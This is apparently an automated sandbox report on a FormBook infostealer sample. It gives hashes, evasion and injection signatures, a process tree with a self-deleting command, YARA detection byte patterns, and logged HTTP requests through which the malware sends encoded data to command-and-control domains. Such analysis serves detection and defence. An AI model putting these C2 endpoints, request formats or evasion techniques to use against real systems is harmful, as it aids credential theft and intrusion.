Loading ...

Play interactive tourEdit tour

Analysis Report eN4poRmfGg.exe

Overview

General Information

Sample Name:eN4poRmfGg.exe
Analysis ID:287698
MD5:1d9d946599bbe47314f6dfa89f1c6e77
SHA1:7bbdeb9670c8dc3a4f529b41b88cdd0900acad00
SHA256:15af9bb36b7a51efea7ab70d98a29ef7059f4f5b7178fef0aaff0671bf6c9386
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • eN4poRmfGg.exe (PID: 7000 cmdline: 'C:\Users\user\Desktop\eN4poRmfGg.exe' MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
    • eN4poRmfGg.exe (PID: 7020 cmdline: 'C:\Users\user\Desktop\eN4poRmfGg.exe' MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6560 cmdline: /c del 'C:\Users\user\Desktop\eN4poRmfGg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • nb4dzn5jg.exe (PID: 1308 cmdline: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
          • nb4dzn5jg.exe (PID: 5356 cmdline: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
        • colorcpl.exe (PID: 1244 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 40 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      26.2.nb4dzn5jg.exe.28d0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        26.2.nb4dzn5jg.exe.28d0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        26.2.nb4dzn5jg.exe.28d0000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17539:$sqlite3step: 68 34 1C 7B E1
        • 0x1764c:$sqlite3step: 68 34 1C 7B E1
        • 0x17568:$sqlite3text: 68 38 2A 90 C5
        • 0x1768d:$sqlite3text: 68 38 2A 90 C5
        • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
        27.1.nb4dzn5jg.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          27.1.nb4dzn5jg.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 43 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3376, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7060
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3376, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7060

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeVirustotal: Detection: 42%Perma Link
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\AppData\Local\Temp\Dbnudz\nb4dzn5jg.exeVirustotal: Detection: 42%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Dbnudz\nb4dzn5jg.exeReversingLabs: Detection: 45%
          Multi AV Scanner detection for submitted fileShow sources
          Source: eN4poRmfGg.exeVirustotal: Detection: 42%Perma Link
          Source: eN4poRmfGg.exeReversingLabs: Detection: 45%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: eN4poRmfGg.exeJoe Sandbox ML: detected
          Source: 27.1.nb4dzn5jg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.eN4poRmfGg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.svchost.exe.2d00000.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 27.2.nb4dzn5jg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.eN4poRmfGg.exe.4180000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.2.nb4dzn5jg.exe.4290000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.eN4poRmfGg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00405934 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405934
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeCode function: 26_2_00405934 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,26_2_00405934

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49742
          Source: global trafficHTTP traffic detected: GET /3nk4/?RZBd8HzP=bIh+1viU3kJZwlU1+bF7NiTuEsJvwz9W2axQZvl/sJKd/5qF7f1dSILuagTiNZjEdxJz&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1Host: www.trulex.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /3nk4/?RZBd8HzP=w0UEi+V/ezucUh8SDyYF/+zgRqcIqbOC7nP1ZKE/fBP38eRJlYPULz8xC7zNwysHBq0j&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1Host: www.reignsponsibly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /3nk4/?RZBd8HzP=bnGlARlxAxXJaK863FaqbUduOQZZdXfDbBghBWs+/ncmCRg0ePvqNMTvjJHXk6PE1an+&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1Host: www.turismoplayas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.reignsponsibly.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.reignsponsibly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reignsponsibly.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 34 57 59 2d 38 62 5a 39 58 44 69 67 4b 68 73 54 5a 53 46 47 67 34 28 4e 58 4c 73 5f 72 6f 36 35 74 44 4f 4f 64 36 42 70 59 31 76 39 38 4e 35 59 6c 4c 4f 5f 4a 6c 74 50 65 34 28 43 6f 6a 78 75 4f 59 55 6d 43 65 69 72 45 4f 4b 51 6c 58 4c 44 6e 50 66 52 78 5f 6d 74 59 45 74 7a 70 54 51 32 54 31 4f 4d 63 50 6e 72 6c 33 52 44 69 42 45 79 52 77 69 6e 58 68 4d 4b 32 7a 72 43 68 71 30 4c 63 46 4b 74 31 5f 75 4b 36 68 33 49 74 35 6a 64 47 4b 56 71 51 52 78 4b 39 6c 75 42 78 46 74 31 7a 54 59 33 68 36 4b 6a 5a 55 73 73 64 30 37 43 64 73 31 42 7a 79 6f 55 46 34 5a 38 48 50 79 56 6a 49 4e 35 75 43 65 78 54 48 66 6c 44 2d 6d 56 7a 47 28 59 32 64 36 75 31 41 5a 65 4d 64 6a 64 68 41 37 58 32 57 6a 51 7a 4c 4f 35 64 48 69 52 62 35 39 51 49 4c 71 6e 5a 57 79 75 35 4d 72 39 77 57 6c 49 35 4e 38 6a 58 66 47 58 42 69 53 70 4d 65 64 51 42 4a 6d 4c 74 30 58 67 5a 39 35 79 6b 4f 47 71 65 59 52 77 63 4f 57 79 6a 39 59 6e 64 35 57 4f 49 6e 7e 69 4c 47 75 49 31 4a 6a 32 38 5a 62 39 49 43 35 41 69 57 37 5f 46 75 7a 59 6f 4b 65 38 73 36 54 33 69 36 64 58 57 4b 57 4c 79 73 64 53 57 39 41 78 39 64 7a 76 63 46 59 54 51 75 4a 50 4c 5f 62 44 47 58 30 79 4b 6c 49 61 62 4c 5a 65 77 50 4e 69 4b 31 36 5f 31 4c 39 31 55 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: RZBd8HzP=4WY-8bZ9XDigKhsTZSFGg4(NXLs_ro65tDOOd6BpY1v98N5YlLO_JltPe4(CojxuOYUmCeirEOKQlXLDnPfRx_mtYEtzpTQ2T1OMcPnrl3RDiBEyRwinXhMK2zrChq0LcFKt1_uK6h3It5jdGKVqQRxK9luBxFt1zTY3h6KjZUssd07Cds1BzyoUF4Z8HPyVjIN5uCexTHflD-mVzG(Y2d6u1AZeMdjdhA7X2WjQzLO5dHiRb59QILqnZWyu5Mr9wWlI5N8jXfGXBiSpMedQBJmLt0XgZ95ykOGqeYRwcOWyj9Ynd5WOIn~iLGuI1Jj28Zb9IC5AiW7_FuzYoKe8s6T3i6dXWKWLysdSW9Ax9dzvcFYTQuJPL_bDGX0yKlIabLZewPNiK16_1L91Ug).
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.reignsponsibly.comConnection: closeContent-Length: 184586Cache-Control: no-cacheOrigin: http://www.reignsponsibly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reignsponsibly.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 34 57 59 2d 38 61 67 4d 62 54 32 39 4f 54 4a 30 57 6d 68 65 72 59 50 66 46 35 6f 6f 36 5f 65 4c 67 78 61 6b 64 37 52 6c 52 51 66 76 74 64 70 59 6e 4e 61 6b 45 6c 74 4d 59 34 28 42 73 6a 38 62 4f 49 73 75 43 61 37 6a 45 50 65 54 73 78 76 47 6e 66 65 4c 33 61 7e 52 4e 55 35 6f 70 52 31 57 64 32 69 55 5a 50 72 72 75 58 5a 42 73 42 34 58 51 79 47 69 65 78 41 50 77 78 62 62 68 64 45 7a 63 6e 32 44 38 65 69 49 78 77 44 44 70 4d 72 78 43 5a 31 35 61 67 41 43 79 43 7e 65 7e 47 35 78 32 57 73 56 6c 4c 4b 73 47 31 45 71 4b 33 6a 77 57 39 78 34 78 6a 59 41 46 36 35 73 4f 64 6d 45 79 5f 74 78 73 78 4b 50 4c 47 62 6e 50 74 7e 64 69 51 72 50 30 63 4c 4d 36 68 70 56 4a 4f 32 46 67 44 44 48 70 48 37 72 78 5f 65 50 57 56 36 35 62 6f 35 6d 48 71 62 46 44 6c 69 39 72 59 6d 79 38 31 49 30 32 4e 38 41 48 76 48 59 4b 79 53 64 4b 2d 5a 6c 42 36 28 45 74 31 50 79 41 5a 4e 33 6a 4e 69 71 61 35 68 4c 50 4f 47 2d 72 73 70 51 5a 2d 32 7a 48 41 32 76 4d 47 76 56 31 4e 62 74 38 5a 62 58 49 44 35 6d 68 48 66 5f 45 38 71 45 6f 70 32 67 34 4b 54 75 67 71 4e 4a 66 5a 53 62 79 73 56 53 58 4d 78 6b 39 73 72 76 4b 41 63 51 52 50 4a 50 49 50 62 44 4b 33 31 75 43 31 31 73 57 35 52 54 34 39 63 50 4e 51 48 66 36 61 49 66 4b 6f 4f 6e 76 42 46 77 76 34 35 45 4c 5a 54 39 4e 49 58 78 39 47 38 31 7a 2d 75 33 43 38 48 49 45 53 37 54 4e 67 72 69 4b 45 54 69 6a 71 41 2d 58 52 72 36 54 33 74 39 34 47 67 42 32 67 4c 5f 73 66 6d 6d 30 76 32 45 39 69 59 54 53 68 67 61 6a 73 39 67 51 75 70 34 48 46 4a 35 58 44 6c 68 6e 37 50 43 73 4c 67 69 7a 70 48 66 57 50 37 64 4c 76 64 43 61 37 79 5a 66 51 5a 68 4f 45 34 75 48 64 35 50 7a 39 79 7a 34 4a 36 56 6f 39 4e 4e 52 72 4d 38 30 4e 6e 69 72 74 30 70 39 52 59 65 6a 38 5a 4a 5a 4a 33 33 71 69 44 42 73 68 31 42 61 75 67 68 56 6a 33 33 44 67 28 62 44 4b 42 4a 43 73 4d 38 31 72 66 6f 73 51 77 61 38 6c 67 70 51 78 33 33 53 6d 5a 45 36 50 46 78 52 6e 4a 31 37 30 37 61 4d 47 71 64 56 37 6a 52 69 58 31 56 69 54 75 43 57 79 6a 53 56 35 7a 34 37 42 72 77 7e 36 41 31 34 74 54 49 38 31 6f 62 37 6d 59 41 51 6e 43 71 38 33 7a 49 47 5f 64 49 69 44 41 73 61 39 5a 5a 58 69 4f 34 49 6d 38 44 39 78 45 6e 4f 4d 4b 72 61 64 4b 59 32 56 61 75 72 79 39 53 38 76 7a 5a 77 63 67 62 31 4c 54 53 55 30 64 7a 6a 67 37 54 49 79 45 52 4a 71 47 4b 4b 66 69 52 41 56 6f 43 62 72 62 66 28 63 42 4a 4c 61 6e 37 69 4b 68 39 7e 33 4f 64 72 75 35 45 31 47 35 54 74 32 68 34 41 70 55 65 39 41 36 37 63 41 4c 37 4a 6d 53 67 55 76 56 77 38 7a 38 32 66 43 5a 59 31 48 42 53 76 4d 54 51 70 46 4d 49 62 6e 63 50 38 43 49 4c 75 35 6e 34 71 37 4a 53 65 37 7e 4e 71 5a 58
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.turismoplayas.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.turismoplayas.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.turismoplayas.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 54 46 4b 66 65 32 6c 6d 45 44 28 64 4e 35 31 36 70 46 50 69 42 69 70 67 49 79 78 51 54 55 7a 66 46 47 68 36 45 45 30 58 34 6d 51 54 46 44 30 71 52 2d 65 6d 59 62 69 4e 33 71 47 4e 30 70 28 7a 36 4c 61 4e 6b 69 74 4d 68 79 79 6b 42 50 69 34 33 48 69 5a 63 75 6c 53 45 66 50 6c 63 2d 62 46 38 31 43 4e 62 59 67 75 55 59 33 76 64 5a 6c 5f 56 6b 73 48 4b 61 65 58 56 53 73 64 70 59 6e 62 79 74 6a 58 6c 34 66 68 35 32 62 6b 63 30 77 5a 49 6b 36 39 39 30 4f 65 66 30 44 43 63 37 5a 72 34 64 70 67 75 6c 70 49 6f 42 77 30 42 5a 65 71 50 52 5a 43 42 6e 43 41 71 51 7a 4f 71 74 63 6c 6c 61 7a 77 75 57 47 66 35 34 49 49 72 70 41 5f 41 49 55 46 47 58 56 72 57 4c 6e 75 75 32 43 4f 38 49 41 39 4e 73 50 41 6e 63 74 36 61 59 34 4c 4d 61 66 2d 61 62 4f 4b 4c 67 39 4e 61 73 6d 39 59 71 59 6b 39 73 64 43 64 78 56 6b 7a 42 34 39 65 64 7e 43 4d 56 61 30 44 69 74 53 75 57 41 56 45 77 44 65 41 71 45 72 58 76 5a 2d 56 59 33 2d 31 30 33 58 31 6b 73 45 63 56 69 5a 46 62 66 71 62 75 72 6c 63 44 31 2d 4d 44 6e 70 6b 48 43 51 51 6e 59 5f 34 6c 73 32 75 50 39 6f 4f 70 6e 76 62 62 75 62 72 55 76 4f 58 4f 39 51 75 31 74 4e 4d 6e 48 54 67 4c 39 37 51 35 6a 71 55 4a 69 79 42 67 56 44 28 5f 61 73 61 79 72 55 63 50 44 36 62 41 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: RZBd8HzP=TFKfe2lmED(dN516pFPiBipgIyxQTUzfFGh6EE0X4mQTFD0qR-emYbiN3qGN0p(z6LaNkitMhyykBPi43HiZculSEfPlc-bF81CNbYguUY3vdZl_VksHKaeXVSsdpYnbytjXl4fh52bkc0wZIk6990Oef0DCc7Zr4dpgulpIoBw0BZeqPRZCBnCAqQzOqtcllazwuWGf54IIrpA_AIUFGXVrWLnuu2CO8IA9NsPAnct6aY4LMaf-abOKLg9Nasm9YqYk9sdCdxVkzB49ed~CMVa0DitSuWAVEwDeAqErXvZ-VY3-103X1ksEcViZFbfqburlcD1-MDnpkHCQQnY_4ls2uP9oOpnvbbubrUvOXO9Qu1tNMnHTgL97Q5jqUJiyBgVD(_asayrUcPD6bA).).
